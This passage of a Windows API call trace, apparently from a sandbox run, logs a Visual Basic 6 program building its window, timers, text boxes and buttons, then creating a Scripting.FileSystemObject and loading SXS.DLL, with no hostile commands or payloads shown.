0x6ec1c6 [0083.623] AdjustWindowRectEx (in: lpRect=0x28fb10, dwStyle=0x2c80000, bMenu=0, dwExStyle=0x40000 | out: lpRect=0x28fb10) returned 1 [0083.624] CreateWindowExA (dwExStyle=0x40000, lpClassName=0xc1c6, lpWindowName=0x0, dwStyle=0x2c80000, X=-2147483648, Y=-2147483648, nWidth=347, nHeight=292, hWndParent=0x6006a, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x70062 [0083.625] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0x81, wParam=0x0, lParam=0x28f634) returned 0x1 [0083.625] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0x83, wParam=0x0, lParam=0x28f620) returned 0x0 [0083.627] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="dwmapi.dll", cbMultiByte=10, lpWideCharStr=0x28e0a8, cchWideChar=2047 | out: lpWideCharStr="dwmapi.dll(((ᝌ)") returned 10 [0083.627] SysReAllocStringLen (in: pbstr=0x28f0ac*=0x0, psz="dwmapi.dll", len=0xa | out: pbstr=0x28f0ac*="dwmapi.dll") returned 1 [0083.627] CharLowerBuffW (in: lpsz="dwmapi.dll", cchLength=0xa | out: lpsz="dwmapi.dll") returned 0xa [0083.628] LoadLibraryExA (lpLibFileName="dwmapi.dll", hFile=0x0, dwFlags=0x0) returned 0x74490000 [0083.636] GetLastError () returned 0x0 [0083.636] SetLastError (dwErrCode=0x0) [0083.636] GetProcAddress (hModule=0x74490000, lpProcName="DwmIsCompositionEnabled") returned 0x74491610 [0083.637] GetSystemMenu (hWnd=0x70062, bRevert=0) returned 0x602c7 [0083.640] SetWindowContextHelpId (param_1=0x70062, param_2=0xffffffff) returned 1 [0083.640] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0x1, wParam=0x0, lParam=0x28f634) returned 0x0 [0083.641] GetWindowRect (in: hWnd=0x70062, lpRect=0x28fad4 | out: lpRect=0x28fad4) returned 1 [0083.641] GetDC (hWnd=0x70062) returned 0xb010b3d [0083.641] GetTextMetricsA (in: hdc=0xb010b3d, lptm=0x28f9fc | out: lptm=0x28f9fc) returned 1 [0083.641] SetBkMode (hdc=0xb010b3d, mode=1) returned 2 [0083.641] OleTranslateColor () returned 0x0 [0083.641] SetBkColor (hdc=0xb010b3d, color=0xf0f0f0) returned 0xffffff [0083.642] OleTranslateColor () returned 0x0 [0083.642] SetTextColor (hdc=0xb010b3d, color=0x0) returned 0x0 [0083.642] OleTranslateColor () returned 0x0 [0083.642] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0xc300b38 [0083.642] SelectObject (hdc=0xb010b3d, h=0xc300b38) returned 0x1b00017 [0083.642] SelectObject (hdc=0xb010b3d, h=0x1900011) returned 0x1900010 [0083.642] ClientToScreen (in: hWnd=0x70062, lpPoint=0x28f9dc | out: lpPoint=0x28f9dc) returned 1 [0083.642] SetBrushOrgEx (in: hdc=0xb010b3d, x=0, y=6, lppt=0x0 | out: lppt=0x0) returned 1 [0083.642] UnrealizeObject (h=0x1900015) returned 1 [0083.643] SelectObject (hdc=0xb010b3d, h=0x1900015) returned 0x1900011 [0083.643] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x14) returned 0x31028b8 [0083.643] SelectObject (hdc=0xb010b3d, h=0x3e0a07cb) returned 0x18a002e [0083.643] GetTextMetricsA (in: hdc=0xb010b3d, lptm=0x28f7f0 | out: lptm=0x28f7f0) returned 1 [0083.647] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xdc) returned 0x310b2f0 [0083.648] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x31028d8 [0083.650] lstrlenA (lpString="ThunderRT6") returned 10 [0083.650] lstrcpyA (in: lpString1=0x28fa20, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.650] lstrlenA (lpString="ThunderRT6") returned 10 [0083.650] lstrcpyA (in: lpString1=0x28f9b4, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.650] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Timer", lpWndClass=0x28f9e0 | out: lpWndClass=0x28f9e0) returned 0 [0083.650] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0083.651] RegisterClassA (lpWndClass=0x28f9e0) returned 0x75c1c7 [0083.651] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1c7, lpWindowName=0x0, dwStyle=0x44010000, X=80, Y=24, nWidth=0, nHeight=0, hWndParent=0x70062, hMenu=0x1, hInstance=0x72940000, lpParam=0x0) returned 0x60052 [0083.651] SetTimer (hWnd=0x60052, nIDEvent=0x60052, uElapse=0x7530, lpTimerFunc=0x0) returned 0x60052 [0083.651] NtdllDefWindowProc_A (hWnd=0x60052, Msg=0x81, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.652] NtdllDefWindowProc_A (hWnd=0x60052, Msg=0x83, wParam=0x0, lParam=0x28f5f0) returned 0x0 [0083.652] NtdllDefWindowProc_A (hWnd=0x60052, Msg=0x1, wParam=0x0, lParam=0x28f604) returned 0x0 [0083.652] NtdllDefWindowProc_A (hWnd=0x60052, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0083.653] NtdllDefWindowProc_A (hWnd=0x60052, Msg=0x3, wParam=0x0, lParam=0x180050) returned 0x0 [0083.653] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xdc) returned 0x310b3d8 [0083.653] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x31028f8 [0083.653] lstrlenA (lpString="ThunderRT6") returned 10 [0083.653] lstrcpyA (in: lpString1=0x28fa20, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.653] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1c7, lpWindowName=0x0, dwStyle=0x44010000, X=48, Y=24, nWidth=0, nHeight=0, hWndParent=0x70062, hMenu=0x2, hInstance=0x72940000, lpParam=0x0) returned 0x20372 [0083.654] SetTimer (hWnd=0x20372, nIDEvent=0x20372, uElapse=0x64, lpTimerFunc=0x0) returned 0x20372 [0083.654] NtdllDefWindowProc_A (hWnd=0x20372, Msg=0x81, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.654] NtdllDefWindowProc_A (hWnd=0x20372, Msg=0x83, wParam=0x0, lParam=0x28f5f0) returned 0x0 [0083.654] NtdllDefWindowProc_A (hWnd=0x20372, Msg=0x1, wParam=0x0, lParam=0x28f604) returned 0x0 [0083.655] NtdllDefWindowProc_A (hWnd=0x20372, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0083.655] NtdllDefWindowProc_A (hWnd=0x20372, Msg=0x3, wParam=0x0, lParam=0x180030) returned 0x0 [0083.659] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xf4) returned 0x310b4c0 [0083.659] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102918 [0083.660] lstrlenA (lpString="Text4") returned 5 [0083.660] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x6) returned 0x310b5c0 [0083.660] lstrlenA (lpString="ThunderRT6") returned 10 [0083.660] lstrcpyA (in: lpString1=0x28fa20, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.660] lstrlenA (lpString="ThunderRT6") returned 10 [0083.660] lstrcpyA (in: lpString1=0x28f9b4, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.660] GetClassInfoA (in: hInstance=0x0, lpClassName="Edit", lpWndClass=0x28f9e0 | out: lpWndClass=0x28f9e0) returned 1 [0083.660] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6TextBox", lpWndClass=0x28f9e0 | out: lpWndClass=0x28f9e0) returned 0 [0083.661] RegisterClassA (lpWndClass=0x28f9e0) returned 0x6ec1c8 [0083.661] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1c8, lpWindowName="Text4", dwStyle=0x440100e0, X=160, Y=0, nWidth=33, nHeight=19, hWndParent=0x70062, hMenu=0x3, hInstance=0x72940000, lpParam=0x0) returned 0x50060 [0083.661] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x81, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.662] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x83, wParam=0x0, lParam=0x28f5f0) returned 0x0 [0083.663] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x1, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.664] IsWindow (hWnd=0x50060) returned 1 [0083.665] IsWindow (hWnd=0x50060) returned 1 [0083.667] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0083.668] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0083.668] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x3, wParam=0x0, lParam=0x200a2) returned 0x0 [0083.668] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x14) returned 0x3102938 [0083.669] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x30, wParam=0x3e0a07cb, lParam=0x0) returned 0x1 [0083.670] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0083.670] ShowWindow (hWnd=0x50060, nCmdShow=5) returned 0 [0083.670] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0083.670] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xf4) returned 0x310b5d0 [0083.670] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102958 [0083.671] lstrlenA (lpString="Text3") returned 5 [0083.671] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x6) returned 0x310b6d0 [0083.671] lstrlenA (lpString="ThunderRT6") returned 10 [0083.671] lstrcpyA (in: lpString1=0x28fa20, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.671] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1c8, lpWindowName="Text3", dwStyle=0x440100e0, X=120, Y=0, nWidth=33, nHeight=19, hWndParent=0x70062, hMenu=0x4, hInstance=0x72940000, lpParam=0x0) returned 0x5005e [0083.671] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x81, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.672] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x83, wParam=0x0, lParam=0x28f5f0) returned 0x0 [0083.672] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x1, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.673] IsWindow (hWnd=0x5005e) returned 1 [0083.673] IsWindow (hWnd=0x5005e) returned 1 [0083.673] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0083.674] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0083.674] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x3, wParam=0x0, lParam=0x2007a) returned 0x0 [0083.674] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x14) returned 0x3102978 [0083.674] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x30, wParam=0x3e0a07cb, lParam=0x0) returned 0x1 [0083.675] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0083.675] ShowWindow (hWnd=0x5005e, nCmdShow=5) returned 0 [0083.675] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0083.675] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xf4) returned 0x310b6e0 [0083.675] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102998 [0083.675] lstrlenA (lpString="Text2") returned 5 [0083.675] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x6) returned 0x310b7e0 [0083.675] lstrlenA (lpString="ThunderRT6") returned 10 [0083.675] lstrcpyA (in: lpString1=0x28fa20, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.675] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1c8, lpWindowName="Text2", dwStyle=0x440100e0, X=80, Y=0, nWidth=33, nHeight=19, hWndParent=0x70062, hMenu=0x5, hInstance=0x72940000, lpParam=0x0) returned 0x4013e [0083.676] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x81, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.676] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x83, wParam=0x0, lParam=0x28f5f0) returned 0x0 [0083.677] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x1, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.677] IsWindow (hWnd=0x4013e) returned 1 [0083.677] IsWindow (hWnd=0x4013e) returned 1 [0083.677] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0083.678] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0083.678] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x3, wParam=0x0, lParam=0x20052) returned 0x0 [0083.679] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x14) returned 0x31029b8 [0083.679] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x30, wParam=0x3e0a07cb, lParam=0x0) returned 0x1 [0083.679] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0083.680] ShowWindow (hWnd=0x4013e, nCmdShow=5) returned 0 [0083.680] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0083.680] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xf4) returned 0x310b7f0 [0083.680] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x31029d8 [0083.680] lstrlenA (lpString="Text1") returned 5 [0083.680] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x6) returned 0x310b8f0 [0083.680] lstrlenA (lpString="ThunderRT6") returned 10 [0083.680] lstrcpyA (in: lpString1=0x28fa20, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.680] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1c8, lpWindowName="Text1", dwStyle=0x440100e0, X=40, Y=0, nWidth=33, nHeight=19, hWndParent=0x70062, hMenu=0x6, hInstance=0x72940000, lpParam=0x0) returned 0x2036e [0083.681] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x81, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.681] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x83, wParam=0x0, lParam=0x28f5f0) returned 0x0 [0083.681] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x1, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.682] IsWindow (hWnd=0x2036e) returned 1 [0083.682] IsWindow (hWnd=0x2036e) returned 1 [0083.682] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0083.683] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0083.683] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x3, wParam=0x0, lParam=0x2002a) returned 0x0 [0083.683] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x14) returned 0x31029f8 [0083.683] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x30, wParam=0x3e0a07cb, lParam=0x0) returned 0x1 [0083.684] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0083.684] ShowWindow (hWnd=0x2036e, nCmdShow=5) returned 0 [0083.684] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0083.685] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xdc) returned 0x310b900 [0083.687] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102a18 [0083.687] lstrlenA (lpString="Command3") returned 8 [0083.687] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x9) returned 0x3101cd8 [0083.687] lstrlenA (lpString="ThunderRT6") returned 10 [0083.687] lstrcpyA (in: lpString1=0x28fa20, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.687] lstrlenA (lpString="ThunderRT6") returned 10 [0083.687] lstrcpyA (in: lpString1=0x28f9b4, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.687] GetClassInfoA (in: hInstance=0x0, lpClassName="Button", lpWndClass=0x28f9e0 | out: lpWndClass=0x28f9e0) returned 1 [0083.687] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6CommandButton", lpWndClass=0x28f9e0 | out: lpWndClass=0x28f9e0) returned 0 [0083.688] RegisterClassA (lpWndClass=0x28f9e0) returned 0x87c1c9 [0083.688] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1c9, lpWindowName="Command3", dwStyle=0x44012000, X=0, Y=48, nWidth=41, nHeight=25, hWndParent=0x70062, hMenu=0x7, hInstance=0x72940000, lpParam=0x0) returned 0x20370 [0083.688] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x81, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.689] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x83, wParam=0x0, lParam=0x28f5f0) returned 0x0 [0083.689] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x1, wParam=0x0, lParam=0x28f604) returned 0x0 [0083.689] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0083.689] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x3, wParam=0x0, lParam=0x300000) returned 0x0 [0083.690] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x14) returned 0x3102a38 [0083.690] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x30, wParam=0x3e0a07cb, lParam=0x0) returned 0x0 [0083.690] ShowWindow (hWnd=0x20370, nCmdShow=5) returned 0 [0083.690] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20370, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0083.691] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xdc) returned 0x310b9e8 [0083.691] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102a58 [0083.691] lstrlenA (lpString="Command2") returned 8 [0083.691] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x9) returned 0x3101cf0 [0083.691] lstrlenA (lpString="ThunderRT6") returned 10 [0083.691] lstrcpyA (in: lpString1=0x28fa20, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.691] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1c9, lpWindowName="Command2", dwStyle=0x44012000, X=0, Y=24, nWidth=41, nHeight=25, hWndParent=0x70062, hMenu=0x8, hInstance=0x72940000, lpParam=0x0) returned 0x20362 [0083.692] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x81, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.692] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x83, wParam=0x0, lParam=0x28f5f0) returned 0x0 [0083.693] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x1, wParam=0x0, lParam=0x28f604) returned 0x0 [0083.693] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0083.693] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x3, wParam=0x0, lParam=0x180000) returned 0x0 [0083.693] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x14) returned 0x3102a78 [0083.694] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x30, wParam=0x3e0a07cb, lParam=0x0) returned 0x0 [0083.694] ShowWindow (hWnd=0x20362, nCmdShow=5) returned 0 [0083.695] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20362, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0083.695] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0xdc) returned 0x310bad0 [0083.695] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x15) returned 0x3102a98 [0083.695] lstrlenA (lpString="Command1") returned 8 [0083.695] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x9) returned 0x3101d08 [0083.695] lstrlenA (lpString="ThunderRT6") returned 10 [0083.695] lstrcpyA (in: lpString1=0x28fa20, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0083.695] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1c9, lpWindowName="Command1", dwStyle=0x44012000, X=0, Y=0, nWidth=41, nHeight=25, hWndParent=0x70062, hMenu=0x9, hInstance=0x72940000, lpParam=0x0) returned 0x20364 [0083.696] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x81, wParam=0x0, lParam=0x28f604) returned 0x1 [0083.696] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x83, wParam=0x0, lParam=0x28f5f0) returned 0x0 [0083.696] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x1, wParam=0x0, lParam=0x28f604) returned 0x0 [0083.697] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x5, wParam=0x0, lParam=0x190029) returned 0x0 [0083.697] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0083.697] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x8, Size=0x14) returned 0x3102ab8 [0083.698] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x30, wParam=0x3e0a07cb, lParam=0x0) returned 0x0 [0083.698] ShowWindow (hWnd=0x20364, nCmdShow=5) returned 0 [0083.698] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x20364, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0083.698] GetClientRect (in: hWnd=0x70062, lpRect=0x28fb90 | out: lpRect=0x28fb90) returned 1 [0083.698] MapWindowPoints (in: hWndFrom=0x70062, hWndTo=0x0, lpPoints=0x28fb90, cPoints=0x2 | out: lpPoints=0x28fb90) returned 9830528 [0083.698] EqualRect (lprc1=0x28fb90, lprc2=0x28fb70) returned 1 [0083.698] SetEvent (hEvent=0x138) returned 1 [0083.699] IsIconic (hWnd=0x70062) returned 0 [0083.699] SendMessageA (hWnd=0x70062, Msg=0x80, wParam=0x1, lParam=0xb0173) returned 0x0 [0083.699] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0x80, wParam=0x1, lParam=0xb0173) returned 0x0 [0083.700] SysReAllocStringLen (in: pbstr=0x28ef34*=0x0, psz="MSVBVM60.DLL", len=0xc | out: pbstr=0x28ef34*="MSVBVM60.DLL") returned 1 [0083.700] CharLowerBuffW (in: lpsz="MSVBVM60.DLL", cchLength=0xc | out: lpsz="msvbvm60.dll") returned 0xc [0083.701] GetModuleHandleW (lpModuleName="C:\\Windows\\system32\\MSVBVM60.DLL") returned 0x72940000 [0083.703] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0xd, wParam=0x208, lParam=0x28e3b0) returned 0x0 [0083.703] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0xd01f5 [0083.705] NtdllDefWindowProc_A (hWnd=0x70062, Msg=0xd, wParam=0x208, lParam=0x28e410) returned 0x0 [0083.705] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x50060, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0083.706] GetFocus () returned 0x0 [0083.706] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0083.706] GetFocus () returned 0x0 [0083.706] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x4013e, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0083.706] GetFocus () returned 0x0 [0083.706] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc5, wParam=0x0, lParam=0x0) returned 0x1 [0083.706] GetFocus () returned 0x0 [0083.709] IsIconic (hWnd=0x70062) returned 0 [0083.709] IsZoomed (hWnd=0x70062) returned 0 [0083.709] GetClientRect (in: hWnd=0x70062, lpRect=0x28fb84 | out: lpRect=0x28fb84) returned 1 [0083.709] GetWindow (hWnd=0x70062, uCmd=0x5) returned 0x60052 [0083.709] GetWindow (hWnd=0x60052, uCmd=0x2) returned 0x20372 [0083.709] GetParent (hWnd=0x60052) returned 0x70062 [0083.709] GetWindow (hWnd=0x20372, uCmd=0x2) returned 0x50060 [0083.709] GetParent (hWnd=0x20372) returned 0x70062 [0083.710] GetWindow (hWnd=0x50060, uCmd=0x2) returned 0x5005e [0083.710] GetParent (hWnd=0x50060) returned 0x70062 [0083.710] GetWindow (hWnd=0x5005e, uCmd=0x2) returned 0x4013e [0083.710] GetParent (hWnd=0x5005e) returned 0x70062 [0083.711] GetWindow (hWnd=0x4013e, uCmd=0x2) returned 0x2036e [0083.711] GetParent (hWnd=0x4013e) returned 0x70062 [0083.711] GetWindow (hWnd=0x2036e, uCmd=0x2) returned 0x20370 [0083.711] GetParent (hWnd=0x2036e) returned 0x70062 [0083.711] GetWindow (hWnd=0x20370, uCmd=0x2) returned 0x20362 [0083.711] GetParent (hWnd=0x20370) returned 0x70062 [0083.711] GetWindow (hWnd=0x20362, uCmd=0x2) returned 0x20364 [0083.711] GetParent (hWnd=0x20362) returned 0x70062 [0083.712] GetWindow (hWnd=0x20364, uCmd=0x2) returned 0x0 [0083.712] GetParent (hWnd=0x20364) returned 0x70062 [0083.885] CLSIDFromProgIDEx (in: lpszProgID="scripting.filesystemobject", lpclsid=0x28f650 | out: lpclsid=0x28f650*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0083.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0083.908] CoCreateInstance (in: rclsid=0x28f650*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28f6f4 | out: ppv=0x28f6f4*=0x1072be0) returned 0x0 [0083.934] SysReAllocStringLen (in: pbstr=0x28e4ac*=0x0, psz="SXS.DLL", len=0x7 | out: pbstr=0x28e4ac*="SXS.DLL") returned 1 [0083.934] CharLowerBuffW (in: lpsz="SXS.DLL", cchLength=0x7 | out: lpsz="sxs.dll") returned 0x7 [0083.934] LoadLibraryW (lpLibFileName="SXS.DLL") returned 0x72ec0000 [0083.934] GetLastError () returned 